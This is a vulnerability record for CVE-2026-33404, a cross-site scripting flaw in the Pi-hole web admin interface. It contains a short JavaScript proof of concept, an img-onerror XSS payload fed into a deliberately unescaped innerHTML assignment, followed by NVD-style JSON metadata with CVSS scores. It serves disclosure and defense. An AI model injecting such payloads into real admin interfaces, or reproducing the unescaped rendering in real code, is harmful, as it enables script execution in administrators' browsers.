CVE-2026-33404

// Conceptual Proof of Concept for CVE-2026-33404 // This demonstrates how the lack of output escaping in network.js can be exploited. // Malicious payload simulating a compromised client hostname // In a real scenario, this would be injected via DHCP or DNS records if upstream validation permits var maliciousHostname = "<img src=x onerror=alert('XSS via CVE-2026-33404')>"; // Vulnerable code simulation in network.js (Original vulnerable logic) // The application takes the hostname directly from the database and assigns it to innerHTML function renderHostname(data) { var element = document.getElementById('client-hostname'); // VULNERABILITY: No sanitization or escaping of 'data.hostname' // If data.hostname contains HTML tags, they are rendered by the browser element.innerHTML = data.hostname; } // Triggering the vulnerability var dbData = { hostname: maliciousHostname }; // When the admin views the Network page, this function runs // resulting in the execution of the alert() payload renderHostname(dbData);

{"cve": {"id": "CVE-2026-33404", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:10.473", "lastModified": "2026-04-14T19:16:29.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, client hostnames and IP addresses from the FTL database are rendered into the DOM without escaping in network.js (Network page) and charts.js/index.js (Dashboard chart tooltips). While upstream validation in dnsmasq and FTL blocks HTML characters via normal DHCP/DNS paths, the web UI performs no output escaping — an inconsistency with other fields in the same file that are properly escaped. This vulnerability is fixed in 6.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:web_interface:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndIncluding": "6.4.1", "matchCriteriaId": "3F1EA9FF-4B56-41DE-A685-A1B75E6ECEF2"}]}]}], "references": [{"url": "https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85wp-ww9v", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}